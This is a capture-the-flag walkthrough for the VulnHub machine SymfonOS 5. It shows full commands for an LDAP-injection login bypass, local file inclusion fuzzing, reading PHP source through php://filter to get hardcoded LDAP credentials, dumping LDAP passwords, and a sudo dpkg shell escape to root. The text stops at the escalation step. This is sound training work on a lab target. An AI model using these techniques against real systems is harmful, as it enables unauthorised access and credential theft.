Symfonos 5 || VulnHub Walkthrough

 Hello, everyone! Welcome back to our VulnHub Walkthrough series. In today’s video, we’ll continue exploring the exciting VulnHub collection with  SymfonOS. Specifically, we’re diving into the 5th virtual machine in the series, SymfonOS 5. This intermediate, OSCP-like, real-world scenario machine is designed to highlight the importance of understanding vulnerabilities and how to exploit them effectively. Let’s get started!

To begin, head over to the VulnHub website and download the machine's image file. If you're new to VulnHub, check out our playlist for helpful guides on how to use the platform. 

Vulhub - Vulnerable by Design

Discover Vulhub, a collection of pre-built Docker environments for security testing. This platform offers a wide range of vulnerable systems to help enhance penetration testing and security assessment skills.

Now, let’s get started with exploiting this machine!


Settings Up

Previously, we downloaded all the 6 image files. 

So, our next step is, to set up the Virtual image in VirtualBox. The downloaded image file is in the form of 7Z format, so start by extracting the archive to access the files within. You’ll find several files, including the essential VMDK files, in the extracted folder.

Now, our next step involves “ creating a new virtual machine ”.


Creating a New VM

In VirtualBox, click "New" to create a new VM. 

Name it " SymfonOS 5," set the OS type to Linux, and choose "Other Linux 64-bit" for the version since the specific distribution is unknown.

Now, allocate the desired amount of RAM

Next, select " Use an existing virtual hard disk file " locate the VMDK file, and click on " Finish " to complete the setup. 

Once the setup is finished, you'll see the " SymfonOS 5 " vulnerable machine in the VirtualBox manager. For better organization, let me regroup it into the VulnHub group.



Network Configuration

To ensure that both your Kali Linux machine (used for attacks) and the vulnerable machine are connected to the same network, do we have to make sure they're both connected via a host-only Adapter

So, go to “ settings ” and change the Network adapter to " Host-Only ." 

Since everything is ready, let’s attempt to start the VM to check if it works.


Start the VMs

Once it's ready, you should see a login prompt, indicating that everything is set up and we can begin our exploration!

Finally, notice that our vulnerable machine is ready and awaiting a login prompt. Let's dive into the fun!   

     

                                                                                                                      

Enumeration


Identify the IP address.

The first step in our attack is enumeration, where we identify the IP address of our target machine using the netdiscover tool. This step helps map the network and locate devices that are up and accessible.

To execute this, open a terminal and enter: netdiscover –i <specify the network interface> to use for scanning, which in this case is eth1

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.200.0/16   |   Screen View: Unique Hosts                                                                                    
                                                                                                                                                         
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.103.2   08:00:27:b8:5c:2b      2     120  PCS Systemtechnik GmbH                                                                                
 192.168.103.1   0a:00:27:00:00:14      1      60  Unknown vendor                                                                                        
 192.168.103.17  08:00:27:4a:bc:90      1      60  PCS Systemtechnik GmbH   

The command output displays a list of devices detected on the network, showing their IP and MAC addresses, as well as the associated vendor.

From these results, we can see several IP addresses along with their corresponding MAC addresses. Our target machine’s IP address is identified as “ 192.168.103.17”.


Mapping the Network

Next, we'll perform a network scan to identify open ports on the target, which is a critical part of the enumeration process. Identifying open ports provides insights into the network’s attack surface, helping us pinpoint services that may be vulnerable to exploitation. For this task, we’ll use the popular network scanning tool, Nmap.

To execute the scan, open a terminal and run the command: nmap -sC < the target IP address>

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.103.17

In this command:

  • -sC: Performs a script scan using Nmap's default scripts to gather additional information about services and identify potential vulnerabilities.
  • -sV: Enables version detection to determine the versions of services running on open ports.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 11:18 EST
Nmap scan report for 192.168.103.17
Host is up (0.00071s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
|   256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_  256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

After the scan is completed, the results reveal four open ports with their respective services:

  1. Port 22 (TCP) : Running SSH (Secure Shell) allows remote access with valid credentials. Although generally secure, weak or default passwords could make it vulnerable.
  2. Port 80 (TCP) : Running HTTP on a web server. The scan shows a basic website with no title hosted on Apache HTTPD, which may contain web-based vulnerabilities.
  3. Port 389 (TCP) : Running OpenLDAP, a directory service protocol. The specific version may indicate potential security weaknesses.
  4. Port 636 (TCP) : Running LDAP over SSL, but the exact protocol couldn't be confirmed.

These open ports present potential entry points into the target system. The next step is to conduct a deeper enumeration of each service to uncover vulnerabilities or clues that could facilitate initial access or shell exploitation. This analysis will guide the development of a strategic approach to compromise the target.


Web Enumeration

Our next steps involve identifying vulnerabilities to gain shell access or another foothold on the target system. Since the HTTP web server is running on Port 80, we’ll start by analyzing it, as web services often serve as primary access points and can reveal additional attack vectors. 

Access the web service by entering the target's IP address directly into a web browser. 

The webpage displays an image resembling Zeus, suggesting a possible exploration or reference to Greek mythology.


Examining the page source by pressing CTRL + U does not reveal any hidden details. 


Directory Enumeration

To locate hidden resources, we will perform directory enumeration using tools like dirb or Gobuster. These tools systematically probe for common directory and file names that are not directly visible on the website. This process can uncover sensitive files or directories that facilitate further exploitation. 

Execute the following command in the terminal:

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.103.17/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec  1 11:21:31 2024
URL_BASE: http://192.168.103.17/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.103.17/ ----
+ http://192.168.103.17/admin.php (CODE:200|SIZE:1650)                                                                                                   
+ http://192.168.103.17/index.html (CODE:200|SIZE:207)                                                                                                   
+ http://192.168.103.17/server-status (CODE:403|SIZE:279)                                                                                                
==> DIRECTORY: http://192.168.103.17/static/                                                                                                             
                                                                                                                                                         
---- Entering directory: http://192.168.103.17/static/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Dec  1 11:21:35 2024
DOWNLOADED: 4612 - FOUND: 3
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The scan reveals three accessible pages. Among them, /admin.php appears particularly interesting. This indicates a potential administrative or control panel for the website. Accessing it could provide significant control over the site.

Upon inspection, we discovered a login portal that could serve as a potential entry point. Initial attempts to log in using default credentials like admin:admin and admin:password were unsuccessful.


Bypass Login using LDAP injection

However, based on the behavior and structure of the login form, it appeared the website might be vulnerable. To confirm and exploit this vulnerability, various payloads were tested while observing the server's responses.

From the previous Nmap scan, we noted that the LDAP service was running on port 389. 

This suggested that the web service could use  LDAP for authentication. Testing for LDAP injection required crafting payloads to manipulate the LDAP query and bypass authentication

A wildcard ( * ) was used as a test payload for both the username and password fields, which is commonly employed for wildcard login testing.

The payload was successful, allowing access and confirming that this page served as an administrative or control panel. 


Enumerate Dashboard for Potential Vulnerability

The header displayed navigation links labeled, "Home," "Portraits," and "Logout." The main content area showed a single message: "Under Development," indicating that the website was still in the development phase and likely not fully functional.

Clicking on "Portraits" revealed an interesting functionality. 

The URL suggested that the  home.php script was using the url parameter to fetch a resource ( http://127.0.0.1/portraits.php ). 

This behavior indicated a possible Server-Side Request Forgery (SSRF) or Local File Inclusion (LFI) vulnerability.


Exploitation 

To determine the specific vulnerability, we will modify the url parameter which will help us to access local files. Let’s start with /etc/passwd .

Upon execution, the server successfully displayed the contents of the passwd file. 

While applications interacting with LDAP often exhibit SSRF vulnerabilities, the observed behavior strongly pointed to an LFI vulnerability in this case.


Leveraging FFUF to Identify LFI File Paths

To further explore accessible file paths and potentially gain a foothold on the target system, ffuf was used for brute-forcing. 

Before proceeding, we need a cookie and also need a wordlist.

Since the LFI vulnerability is being tested within a logged-in session, a valid session cookie is required. Without the cookie, ffuf will treat the page as inaccessible due to the lack of authentication.

Open the browser's developer tools (usually by pressing F12 ), navigate to the Storage or Network tab, and copy the session cookie.

For brute-forcing, we used the Seclist LFI wordlist. But, it is not available in Kali Linux, so we will have to download it from GitHub.

SecLists - LFI Fuzzing Payloads

Explore LFI (Local File Inclusion) payloads curated for penetration testing. These payloads are part of the SecLists project, offering a comprehensive collection of security testing resources.

We executed the following command, 

┌──(kali㉿kali)-[~]
└─$ ffuf -u 'http://192.168.103.17/home.php?url=FUZZ' -b 'PHPSESSID=ouhchfm3povipficctivmdi81h' -w /home/kali/Downloads/LFI-LFISuite-pathtotest-huge.txt -c -fw 117

where:

  • -u is used to specify the target URL with FUZZ as the placeholder for brute-forcing.
  • -b  is used to provide the session cookie for authentication.
  • -w  is used to point to the wordlist used for testing file paths.
  • -c  is used to enable colored output for easier result interpretation.
  • -fw  is used to refine false positives to filter responsive words, which is in our case 117 words . (Watch the video to know.)
After filtering, the command displayed valid file paths. Inserting these paths into the URL revealed various files. 


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.103.17/home.php?url=FUZZ
 :: Wordlist         : FUZZ: /home/kali/Downloads/LFI-LFISuite-pathtotest-huge.txt
 :: Header           : Cookie: PHPSESSID=ouhchfm3povipficctivmdi81h
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 117
________________________________________________

/etc/passwd             [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 12ms]
/etc/group              [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 10ms]
../../../../etc/group   [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 6ms]
../../../etc/group      [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 6ms]
../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 10ms]
../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 8ms]
../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 7ms]
../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 10ms]
../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 8ms]
../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 4ms]
../../../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 2ms]
../../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 2ms]
../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 5ms]
../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 5ms]
../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 7ms]
../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 7ms]
../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 7ms]
../../../../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 17ms]
../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 4ms]
../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 8ms]
../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 11ms]
../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 9ms]
../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 12ms]
../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 11ms]
../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 6ms]
../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 12ms]
../../../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 4ms]
/proc/self/cmdline      [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 22ms]
../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 4ms]
../../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 8ms]
../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 11ms]
../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 13ms]
../../../../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 10ms]
/proc/self/stat         [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 7ms]
../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 6ms]
../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 9ms]
../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 4ms]
../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 2ms]
../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 10ms]
../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 3ms]
../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 13ms]
../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 9ms]
../../../../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 14ms]
../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 11ms]
../../../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 6ms]
../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 13ms]
../../../../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 9ms]
../../../../../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 10ms]
../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 15ms]
../../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 15ms]
../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 3ms]
/proc/self/status       [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 13ms]
../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 2ms]
../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 6ms]
../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 1ms]
../../../../../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 6ms]
../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 7ms]
../../../../../../proc/self/status [Status: 200, Size: 1944, Words: 207, Lines: 83, Duration: 6ms]
../../../../../../../../../../../proc/self/status [Status: 200, Size: 1944, Words: 207, Lines: 83, Duration: 3ms]
../../../../../../../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 5ms]
../../../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 11ms]
../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 7ms]
../../../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1944, Words: 207, Lines: 83, Duration: 7ms]
../../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1944, Words: 207, Lines: 83, Duration: 8ms]
../../../../../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 9ms]
../../../../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 15ms]
../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 18ms]
/proc/self/fd/11        [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 11ms]
../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 11ms]
../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 2ms]
../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 3ms]
../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 6ms]
../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 4ms]
../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 3ms]
../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 13ms]
../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 12ms]
../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 5ms]
../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 12ms]
../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 15ms]
../../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 6ms]
../../../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 928ms]
../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 931ms]
../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 956ms]
../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 1950ms]
../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 1971ms]
../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 1979ms]
../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 1990ms]
../../../etc/passwd     [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2015ms]
../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2026ms]
../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2054ms]
../../../../etc/passwd  [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2070ms]
../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2114ms]
../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2133ms]
../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2139ms]
../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2193ms]
../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2226ms]
:: Progress: [9513/9513] :: Job [1/1] :: 1081 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

However, none of the files contained valuable information. This required further analysis and strategizing to decide the next steps.


Investigating the Web file source code

Attempts were then made to access the source code of PHP files, as they often contain sensitive information like database usernames and passwords. 

Directly accessing PHP files only displayed their rendered content rather than the source code. So, we have to use the PHP wrapper method to bypass this. 

The PHP wrapper encodes the content of the file in Base64, allowing access to its raw content without triggering execution on the server. 

This approach was used to load the source code of the PHP files. 

Upon execution, the server returned the Base64-encoded content of the file. However, manually copying the Base64 text was cumbersome. 

Instead, the the  curl command line tool was used to directly retrieve and save the Base64-encoded content to a local file for easier processing.

The following considerations were necessary during this step:

The cookie was required for authentication. Without it, access to the file was denied. 

  • The -o flag in the curl command saved the output to a file for subsequent decoding.

┌──(kali㉿kali)-[~]
└─$ curl 'http://192.168.103.17/home.php?url=php://filter/convert.base64-encode/resource=home.php' --cookie 'PHPSESSID=ouhchfm3povipficctivmdi81h' -o home.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2547  100  2547    0     0   140k      0 --:--:-- --:--:-- --:--:--  146k
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$

After saving the file locally, we need to open the file in a text editor. 

Next, copy the Base64-encoded content. For decoding, I am going to use an online Base64 decoder.

Base64 Decode Online Tool

Use this online Base64 decode tool to quickly decode Base64-encoded data. This resource is helpful for developers and penetration testers needing to process encoded strings.


Now, let’s decode it. 

Here, the content of home.php has been decoded.

Upon inspecting the decoded content of home.php, no sensitive information was found. 

We then repeated the same process with admin.php

┌──(kali㉿kali)-[~]
└─$ curl 'http://192.168.103.17/home.php?url=php://filter/convert.base64-encode/resource=admin.php' --cookie 'PHPSESSID=ouhchfm3povipficctivmdi81h' -o admin.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4603  100  4603    0     0  1879k      0 --:--:-- --:--:-- --:--:-- 2247k
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$

Upon inspection, it revealed hardcoded LDAP credentials in its source code.

The authLdap function contained the following credentials:

  • Username: cn=admin,dc=symfonos,dc=local
  • Password: qMDdyZh3cT6eeAWD

These credentials allowed direct binding to the LDAP server, enabling unauthorized operations or enumeration.


Enumerate LDAP service to retrieve sensitive information

To enumerate LDAP, the retrieved credentials will be used to perform queries and identify critical information within the directory structure. This process can uncover valuable details such as user accounts, groups, or configurations that could aid in further exploitation.

The tool used for this task is ldapsearch , a command-line utility for querying and retrieving data from an LDAP (Lightweight Directory Access Protocol) server. Its flexible syntax supports parameters for authentication, base DN, filters, and attributes.

To begin, run the following command:

┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -H ldap://192.168.103.17 -D "cn=admin,dc=symfonos,dc=local" -w qMDdyZh3cT6eeAWD -b "dc=symfonos,dc=local"
Where,
  • ldapsearch   -x   which is used for enabling simple authentication,
  • –H  which is used to specify the LDAP URI.
  • -D   which is used for providing the Bind DN (Distinguished Name). It is typically an administrative account.
  • –w  which is used for supplying the bind password, and 
  • –b  which is used for defining the base DN, which serves as the starting point for the search.

# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
gecos: Zeus User

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The search results include  the domain entry (that is  dc=symfonos,dc=local ) , the  admin  entry with an encrypted password in the  userPassword  field, and the  zeus  entry representing a user account.

Attributes for the zeus entry include: 

  • UID (User ID): zeus
  • CN (Common Name): admin
  • loginShell (Shell environment):   /bin/bash  (indicating a Unix/Linux user) 
  • homeDirectory (User's home directory):   /home/zeus
  • userPassword (encrypted password, Base64-encoded):  Y2V0a0tmNHdDdUhDOUZFVA==

The userPassword attribute   zeus is in the form of Base64-encodedTo decode the password, run the following command.

┌──(kali㉿kali)-[~]
└─$ echo 'Y2V0a0tmNHdDdUhDOUZFVA==' | base64 -d
cetkKf4wCuHC9FET                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Now, we have a valid username and password, so, our next step involves, using these credentials, we will try to establish an SSH login attempt on target machine to gain a foothold on the target system.


Foothold

Establish Connection via SSH

To gain an SSH connection, on the terminal, use ssh followed by the username, zero, at the rate, then specify the target IP address.

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.103.17 (192.168.103.17)' can't be established.
ED25519 key fingerprint is SHA256:AUY0DS5ZQcOdGTwmyBVNdv+UiiIPJG+sZ6/6vIoVhq8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.103.17' (ED25519) to the list of known hosts.
[email protected]'s password: 

Now, specify the password.

[email protected]'s password: 
Linux symfonos5 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb  5 06:14:43 2020 from 172.16.1.1
zeus@symfonos5:~$

The SSH login using the credentials was successful, providing access to the remote system. Upon connecting, the system fingerprint was verified and added to the known_hosts file.

zeus@symfonos5:~$ ls -al
total 24                                                                                                                                                  
drwxr-xr-x 3 zeus zeus 4096 Feb  5  2020 .                                                                                                                
drwxr-xr-x 3 root root 4096 Jan  3  2020 ..                                                                                                               
lrwxrwxrwx 1 root root    9 Jan  6  2020 .bash_history -> /dev/null                                                                                       
-rw-r--r-- 1 zeus zeus  220 Jan  3  2020 .bash_logout                                                                                                     
-rw-r--r-- 1 zeus zeus 3526 Jan  3  2020 .bashrc                                                                                                          
drwx------ 3 zeus zeus 4096 Jan  6  2020 .gnupg                                                                                                           
-rw-r--r-- 1 zeus zeus  807 Jan  3  2020 .profile                                                                                                         
zeus@symfonos5:~$ 

After gaining access, the user’s home directory was inspected for the user flag, but it was not present. With no user flag available, the next logical step is Privilege Escalation to obtain higher-level access and locate the root flag.


Privilege Escalation

In the privilege escalation process, the primary objective is to further enumerate the system to identify misconfigurations, exploitable vulnerabilities, or overlooked permissions that could enable escalation to root or another privileged user. This includes investigating file permissions , SUID files , running services , and scheduled tasks for potential exploitation opportunities.


Enumerating System Information

However, as we currently operate with limited user privileges through the reverse shell, we face restrictions on accessing certain files or commands for a comprehensive assessment.

To move forward, we run the sudo -l command to determine if the user Zeus had any special sudo privileges.

zeus@symfonos5:~$ sudo -l                                                                                                                                 
Matching Defaults entries for zeus on symfonos5:                                                                                                          
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                                                
                                                                                                                                                          
User zeus may run the following commands on symfonos5:                                                                                                    
    (root) NOPASSWD: /usr/bin/dpkg                                                                                                                        
zeus@symfonos5:~$ 

The sudo -l output revealed that Zeus could execute the /usr/bin/dpkg command as root without requiring a password. This opens a path to escalate privileges and gain root access.


Local Privilege Escalation via Missing passwd in dpkg File Path

To exploit this, the dpkg command is used to run a binary that retains elevated privileges. This binary allows access to the file system, escalates to root, or maintains privileged access.

The process involves:

Visiting the GTFOBins website, a repository of Unix binaries that can bypass standard security restrictions, to identify a suitable command for privilege escalation using dpkg.

GTFOBins - GTFO Binaries

Explore GTFOBins, a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. A valuable resource for penetration testers and security professionals.

Searching for dpkg on GTFOBins, which confirmed its ability to execute commands with elevated privileges. 

Running sudo dpkg -l followed by injecting !/bin/sh to open a root shell .

zeus@symfonos5:~$ sudo dpkg -l                                                                                                                            
